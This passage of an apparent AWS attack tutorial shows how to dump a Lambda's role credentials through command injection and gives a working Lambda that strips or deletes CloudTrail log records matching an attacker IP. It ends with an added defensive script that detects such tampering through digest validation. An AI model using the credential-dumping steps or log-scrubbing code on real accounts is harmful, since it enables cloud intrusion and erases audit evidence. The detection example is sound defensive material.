Lambda places the function code in a read-only partition mounted at /var/task. With interactive access to the container, inspecting the function code shows what the function does and what it has access to:
    ls /var/task
    cat /var/task/lambda_function.py
We can retrieve the Lambda execution role credentials by dumping the environment variables. Run “export” via command injection or from within the running Lambda.
Retrieve the aws_access_key_id, aws_secret_access_key and aws_session_token, then configure your AWS CLI with aws configure --profile <PROFILE_NAME>.
You need to manually add the aws_session_token to the new profile in “~/.aws/credentials”.
The aws_session_token doesn’t last long; you need to refresh it after a while.
    import json
    import urllib
    import boto3
    import gzip
    import tempfile
    import shutil

    dirty_tag = <IP_ADDRESS>

    def filter_dirty_tag(log):
        return dirty_tag in json.dumps(log)

    s3 = boto3.client('s3')

    def lambda_handler(event, context):
        bucket = event['Records'][0]['s3']['bucket']['name']
        key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')
        resp = s3.get_object(Bucket=bucket, Key=key)
        gzip_tmp = tempfile.NamedTemporaryFile(delete=False)
        shutil.copyfileobj(resp['Body'], gzip_tmp)
        gzip_tmp.close()
        gzip_filename = gzip_tmp.name
        with gzip.open(gzip_filename, 'rb') as f:
            file_content = f.read()
        logs = json.loads(file_content)
        old_num_logs = len(logs['Records'])
        print old_num_logs
        logs['Records'] = filter(lambda x: not filter_dirty_tag(x), logs['Records'])
        print len(logs['Records'])
        if len(logs['Records']) == 0:
            print "Deleting empty %s" % key
            s3.delete_object(Bucket=bucket, Key=key)
        elif len(logs['Records']) == old_num_logs:
            print "Doing nothing no log records filtered"
        else:
            print "Updating %s" % key
            with gzip.open(gzip_filename, 'wb') as f:
                f.write(json.dumps(logs, separators=(',', ':')))
            s3.put_object(Bucket=bucket, Key=key, Body=open(gzip_filename, 'rb'))
Add the trigger for this function by clicking “S3” on the left-hand side of the interface in the web console. Select the S3 bucket with the logs and then click the “Add” button.
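The function above rewrites or deletes CloudTrail log objects in S3, which is the kind of change CloudTrail log file integrity validation is designed to reveal. The following is an added example, not code from the original page: it compares each log file listed in a digest with the object stored now and reports it as ok, modified or missing. It assumes integrity validation is enabled on the trail; the bucket name, object keys, records and digest are constructed samples, and verifying the digest's own signature is left to aws cloudtrail validate-logs.

```python
import gzip
import hashlib
import hmac
import json
import zlib

def make_log(records):
    """Build a gzip-compressed CloudTrail-style log object (constructed sample)."""
    body = json.dumps({"Records": records}, separators=(",", ":"))
    return gzip.compress(body.encode("utf-8"))

def check_digest(digest, fetch):
    """Classify each log file named in a digest as ok, modified or missing.

    fetch(bucket, key) returns the stored bytes, or None if the object is gone.
    """
    results = {}
    for entry in digest["logFiles"]:
        key = entry["s3Object"]
        stored = fetch(entry["s3Bucket"], key)
        if stored is None:
            results[key] = "missing"
            continue
        try:
            # The digest's hashValue is the hex SHA-256 of the uncompressed log.
            actual = hashlib.sha256(gzip.decompress(stored)).hexdigest()
        except (OSError, EOFError, zlib.error):
            results[key] = "modified"  # no longer a valid gzip stream
            continue
        same = hmac.compare_digest(actual, entry["hashValue"].lower())
        results[key] = "ok" if same else "modified"
    return results

def demo():
    """Constructed sample: one log untouched, one rewritten, one deleted."""
    keep = {"eventName": "ListBuckets", "sourceIPAddress": "198.51.100.7"}
    drop = {"eventName": "GetObject", "sourceIPAddress": "203.0.113.9"}
    original = {"logs/a.json.gz": make_log([keep]),
                "logs/b.json.gz": make_log([keep, drop]),
                "logs/c.json.gz": make_log([drop])}
    digest = {"logFiles": [
        {"s3Bucket": "example-trail-bucket", "s3Object": key,
         "hashAlgorithm": "SHA-256",
         "hashValue": hashlib.sha256(gzip.decompress(blob)).hexdigest()}
        for key, blob in original.items()]}
    stored = dict(original)
    stored["logs/b.json.gz"] = make_log([keep])  # one record removed, rewritten
    del stored["logs/c.json.gz"]                 # all records removed, deleted
    return check_digest(digest, lambda bucket, key: stored.get(key))
```

In a real account, fetch would wrap s3.get_object on the log bucket and the digest would be read from the trail's CloudTrail-Digest prefix.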